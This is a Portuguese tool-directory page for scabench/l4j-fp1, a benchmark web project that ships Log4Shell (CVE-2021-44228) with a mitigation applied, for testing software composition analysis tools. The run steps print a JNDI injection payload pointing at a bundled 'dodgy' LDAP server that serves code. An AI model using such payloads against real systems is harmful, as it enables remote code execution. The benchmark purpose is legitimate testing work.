Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
l4j-fp1 — projeto web jee com a vulnerabilidade log4shell (CVE-2021-44228) sanitizada | Kitploit
Ferramentas/GitHubGitHub/scabench/l4j-fp1
Análise de VulnerabilidadesAnálise de CódigoExploraçãoSegurança WebSegurança da Cadeia de SuprimentosAprendizado e Educação
GitHubscabench/l4j-fp1

l4j-fp1

projeto web jee com a vulnerabilidade log4shell (CVE-2021-44228) sanitizada

Ver Repositório
15há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

log4shell falso positivo

Este é um projeto web simples com uma vulnerabilidade log4shell sanitizada. Para uma versão não sanitizada, veja https://github.com/scabench/l4j-tp1/. O projeto define um simples serviço get scabench.HelloWorldService que retorna uma string de texto simples hello world. O serviço não espera parâmetros e, se forem encontrados parâmetros, um erro é registado.

A dependência vulnerável é org.apache.logging.log4j:log4j-core:2.14.1, a vulnerabilidade é CVE-2021-44228.

Sanitização

O projeto usa um agente desenvolvido pela Amazon quando log4shell surgiu e nenhum patch estava disponível. O agente irá desativar a classe vulnerável org.apache.logging.log4j.core.lookup.JndiLookup.

A utilização do agente é imposta ao instalar (também conhecido como anexar) o agente dinamicamente quando scabench.HelloWorldService é carregado (no bloco estático da classe), se isso falhar, a aplicação falha. Isto requer que a JVM permita a auto-anexação do agente.

Executar a Aplicação

  1. ative a auto-anexação do agente JVM: export MAVEN_OPTS="-Djdk.attach.allowAttachSelf=true"
  2. inicie o servidor web embutido: mvn jetty:run
  3. inicie o servidor ldap incluído: java -jar dodgy-ldap-server.jar (o código vulnerável irá descarregar código Java deste servidor)
  4. aponte o navegador para http://localhost:8080/, este site contém um formulário pré-preenchido com um payload malicioso ${jndi:ldap://127.0.0.1/exe}
  5. submeta este formulário
  6. isto NÃO irá criar o ficheiro foo no servidor (como a versão não sanitizada) faz)

Note que ao executar a aplicação, a seguinte linha aparece na consola:

Transforming org/apache/logging/log4j/core/lookup/JndiLookup .

Demonstrar a Sanitização com um Teste

Isto requer unix ou macos. É fácil portar este projeto para windows. É fornecido um teste unitário para demonstrar a vulnerabilidade; a configuração é a mesma usada em https://github.com/scabench/l4j-tp1/. Devido à sanitização, o teste agora falha.

Executar Análises de Composição de Software

Existem vários scripts sh para executar diferentes análises; os relatórios de resultados podem ser encontrados em scan-results.

Gerar o SBOM

O pom.xml tem um plugin para gerar um SBOM no formato CycloneDX. Para isso, execute mvn cyclonedx:makePackageBom; o SBOM pode ser encontrado em target/ nos formatos json e xml.

Baixar ferramenta